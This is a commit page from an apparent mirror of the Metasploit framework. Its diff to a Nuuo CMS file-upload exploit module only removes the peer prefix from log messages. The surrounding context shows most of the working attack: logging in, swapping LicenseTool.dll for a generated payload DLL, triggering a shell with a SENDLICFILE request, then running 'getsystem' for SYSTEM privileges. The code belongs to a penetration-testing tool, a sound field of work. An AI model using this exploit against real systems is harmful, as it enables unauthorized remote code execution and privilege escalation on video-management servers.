infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Remove peer as that is not needed

GSoC/Meterpreter_Web_Console
Pedro Ribeiro 2019-01-22 12:08:41 +07:00 committed by GitHub
parent af9d7727ad
commit 0685ebed76
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 12 additions and 12 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

24
modules/exploits/windows/nuuo/nuuo_cms_fu.rb
View File

@ -50,25 +50,25 @@ class MetasploitModule < Msf::Exploit::Remote
def on_new_session(client)
if client.type == "meterpreter"
print_warning("#{peer} - Please wait a bit while we clean up")
print_warning("Please wait a bit while we clean up")
client.sys.process.get_processes().each do |proc|
if proc['name'] == "NCS_Server.exe"
client.sys.process.kill(proc['pid'])
sleep 5
client.shell_command_token("move /y #{@dll} LicenseTool.dll")
client.sys.process.execute("NCS_Server.exe")
print_good("#{peer} - Successfully restored LicenseTool.dll!")
print_good("Successfully restored LicenseTool.dll!")
end
end
# elevate privs to system (we're already Admin anyway), and we're done!
client.run_cmd("getsystem")
print_good("#{peer} - We should have SYSTEM now, enjoy your shell!")
print_good("We should have SYSTEM now, enjoy your shell!")
else
print_error("#{peer} - You are not using meterpreter, so we are unable to restore LicenseTool.dll")
print_error("#{peer} - To restore it, kill the NCS_Server.exe process and copy <CMS_FOLDER>\\#{@dll} to <CMS_FOLDER>\\LicenseTool.dll")
print_error("#{peer} - ... otherwise the Nuuo CMS installation will be nuked!")
print_good("#{peer} - Anyway, enjoy your shell!")
print_error("You are not using meterpreter, so we are unable to restore LicenseTool.dll")
print_error("To restore it, kill the NCS_Server.exe process and copy <CMS_FOLDER>\\#{@dll} to <CMS_FOLDER>\\LicenseTool.dll")
print_error("... otherwise the Nuuo CMS installation will be nuked!")
print_good("Anyway, enjoy your shell!")
end
end
@ -76,23 +76,23 @@ class MetasploitModule < Msf::Exploit::Remote
login
if @session == nil
fail_with(Failure::NoAccess, "#{peer} - Failed to login to Nuuo CMS")
fail_with(Failure::NoAccess, "Failed to login to Nuuo CMS")
end
# Download and upload a backup of LicenseTool.dll, so that we can restore it at post
# and not nuke the CMS installation.
@dll = rand_text_alpha(12)
print_status("#{peer} - Backing up LicenseTool.dll to #{@dll}")
print_status("Backing up LicenseTool.dll to #{@dll}")
dll_data = download_file("LicenseTool.dll")
upload_file(@dll, dll_data)
print_status("#{peer} - Uploading payload...")
print_status("Uploading payload...")
upload_file("LicenseTool.dll", generate_payload_dll)
print_status("#{peer} - Sleeping 15 seconds...")
print_status("Sleeping 15 seconds...")
sleep 15
print_status("#{peer} - Sending SENDLICFILE request, shell incoming!")
print_status("Sending SENDLICFILE request, shell incoming!")
license_data = rand_text_alpha(50..350)
send_data_msg(["SENDLICFILE", "FileName: #{rand_text_alpha(3..11)}.lic",
"Content-Length: " + license_data.length.to_s], license_data)